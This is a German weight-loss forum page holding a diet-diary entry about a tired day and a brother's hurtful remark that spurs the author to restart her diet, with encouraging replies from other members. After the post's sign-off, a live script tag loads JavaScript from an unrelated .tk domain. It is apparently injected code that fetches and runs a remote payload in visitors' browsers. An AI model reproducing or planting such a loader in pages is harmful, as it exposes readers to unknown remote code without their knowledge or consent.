Zum Inhalt springen

Sie sind hier

21.08.14 - ein Motivationsbad genommen!

0  0
Am von im Ernährungstagebuch geschrieben

Gestern war so ein Tag, der nicht wirklich optimal war von der Energie her. Einfach so müde. Esstechnisch aber fast gut. Nur die Chips hätt ich mir verkneifen können, waren aber nicht mal 50g - also immerhin.

Und dann kam abends noch mein Bruder zu Besuch. Und am Rande erwähnt er, ich solle doch mehr tun gegen den Speck! Yeah, danke schön. So richtig ein Tritt in den Allerwertesten. :/ Und er hat ja auch recht, aber als er gegangen war, war mir einfach nicht mehr wohl. So sehen die anderen mich...

Deshalb hab ich mich dann nach oben gezogen, und hab mir ein Erinnerungsstütze gebastelt. Diese Ablenkung hat mir geholfen nicht gleich noch über irgendwas herzufallen. Also gut, dann auf in die nächste Runde. Nur diesmal richtig. Keine Ausreden mehr. Darin bin ich leider eine wahre Meisterin!

Tja und so hab ich dann gleich gestern "neu" gestartet ins neue Glück! Nicht wieder aufschieben bis zum nächsten Tag, oder bis nach dem Wochenende, nein nein, gleich anfangen... Smile

 

Ich wünsch euch allen einen schönen Tag!

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Vorheriger Ernährungstagebuch-Eintrag
Bild von Emma09 20.08.2014 wann werd ich endlich
Nächster Ernährungstagebuch-Eintrag
Bild von ListenToTheVoice Wieder neu durchstarten!

Kommentare

Bild des Benutzers laughy
0  0

Owei das tut weh wenn ein Herzensmensch sowas sagt, aber zum Glück wertest Du es als Ansporn weiter und es noch besser zu machen..Du schaffst das , ich mein 10 Kilo sind doch schon weg , die nächsten gehen auch und dann kommt wieder die Zeit wo Leute nette Sachen sagen Wink

*** Das Leben ist zu kurz um aufzugeben ***

Bild des Benutzers clearme
0  0

Ja ich nehm es ihm nicht krum. Er wollte mir damit nicht verletzen, mir einfach nur die Augen öffnen. Bin ihm nicht mehr böse...

Ja diese 10kg sind weg, stimmt dafür hab ich glatt über 1 Jahr gebraucht, weil ich eben zu gerne die falschen Dinge esse. Tja, das wird sich jetzt ändern. Kann doch nicht sein, dass es alle können, nur ich nicht!

Bild des Benutzers laughy
0  0

Bei mir dauerts auch länger, einmal wegen meiner Krankheit und weil ich jede We sündige, aber solange es runter geht finde ichs noch immer in Ordnung, werde jetzt auch strenger zu mir werden Wink

Wir schaffen das yes

*** Das Leben ist zu kurz um aufzugeben ***

Bild des Benutzers Julius
0  0

Das mit den "lieben Worten"kenne ich:((

bei mir hat mir mein kleiner Sohn(4 Jahre) die Augen geöffnet..

es tut zwar sehr weh- aber vielleich braucht man genau so einen Tritt damit man wach wird!!!

 

 

Bild des Benutzers laughy
0  0

Ich denke die die einem am Nächsten stehen meinen es auch am Besten mit einem Wink

*** Das Leben ist zu kurz um aufzugeben ***

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von HanniSunny: Heute morgen hätte ich am liebsten geweint mich krankgemeldet und mich daheim im Bett verkrochen. Heute ist ja ein mega warmer Tag und ich hab absolut nichts zum anziehen. Meine ganzen Klamotten vom...
Eintrag in ein Ernährungstagebuch von veilchen: Frühstück vk müsli zuckerfrei mit joghurt und Blaubeeren Mittags 2 vk brötchen mit Käse Abends Kaisergemüse Snack 2 grüne Äpfel Ich war gestern auch auf der Waage gestanden und egal wie formschön ich...
Motivation von Diecoolejule: Bald stehen wieder die ganzen Sommerparties an. Immer muss ich weite Klamotten suchen, die noch passen. Ich will das aber nicht mehr! Ich möchte in alles wieder passen und mich bei meinen Röcken und...
Eintrag in ein Ernährungstagebuch von Juergen12053: Essen: Frühstück zwei Scheiben Brot und etwas rohen Kohlrabi, Mittag: zwei Buletten und zwei rote Paprika als Rohkost und 0,3l Brühe, Nachmittags drei Plattpfirsiche und am Abend rohe Tomate 300g und...
Eintrag in ein Ernährungstagebuch von Shayleene: Heute ist Wiegetag. Wie vermutet ist es wieder 500 Gramm hoch. Hatte die letzten 2 Tage einen Kurs, den ich von der Arbeit aus besuchen musste. Inkl. Verpflegung Das war wohl das Hauptproblem. Es...
Eintrag in ein Ernährungstagebuch von Ramona60: nach dem Aufstehen Kaffee mit Milch   Frühstück im Büro: glutenfreie Haferflocken ca 40 g, Flohsamen 10 g, Cornflakes ohne Zucker ca 10 g, mit 150 ml lauwarmer Milch 1,5 % aufgegeossen und 125...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst

Neue Abnehmen-Tipps